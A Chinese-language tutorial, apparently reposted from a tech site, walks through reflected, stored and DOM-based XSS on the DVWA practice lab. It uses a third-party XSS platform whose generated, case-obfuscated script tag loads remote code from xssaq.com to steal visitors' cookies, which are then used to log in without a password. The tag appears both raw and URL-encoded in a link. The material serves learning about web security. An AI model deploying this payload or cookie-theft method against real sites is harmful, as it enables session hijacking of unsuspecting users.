一、XSS介绍
跨站脚本攻击(CrossSiteScripting),为不和层叠样式表(CascadingStyleSheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
二、XSS平台
1、注册登陆我们的账号,没有百分之百的安全,仅供测试交流
https://xssaq.com/xss.php
2、新建项目
3、自动生成要插入的xss代码
<sCRiPt/SrC=https://xssaq.com/dGLM>
三、反射性xss
1、在存在xss漏洞的网站,插入上面生成的xss代码,点击submit
2、刷新xss平台,会发现有一条数据
3、知道了网址,也知道cookie,下面利用工具登录,不用输入账号密码,直接登录了dvwa平台
4、反射性xss是一次性的,也就是说,需要人去点击下面的链接,才能触发该漏洞
http://192.168.1.14/dvwa/vulnerabilities/xss_r/?name=%3CsCRiPt%2FSrC%3Dhttps%3A%2F%2Fxssaq.com%2FdGLM%3E#
四、存储型xss
1、在留言板输入上面生成xss代码
2、只要刷新一下该页面,xss平台就出现一条记录,也就是说只要有人看到该留言板,我们就能获取其cookie
3、利用工具登录
4、存储型xss漏洞,理论是永久的,只要有人浏览到你插入的代码,他的cookie信息就会被拿到。
五、DOM型XSS
1、点击select,发现url中有English,
2、修改url中english为aaa,发现插入了代码中,所以存在dom型xss注入
3、插入生成的xss代码,即可获取对方的cookie
内容出处:,
声明:本网站所收集的部分公开资料来源于互联网,转载的目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。如果您发现网站上有侵犯您的知识产权的作品,请与我们取得联系,我们会及时修改或删除。文章链接:http://www.yixao.com/tech/22005.html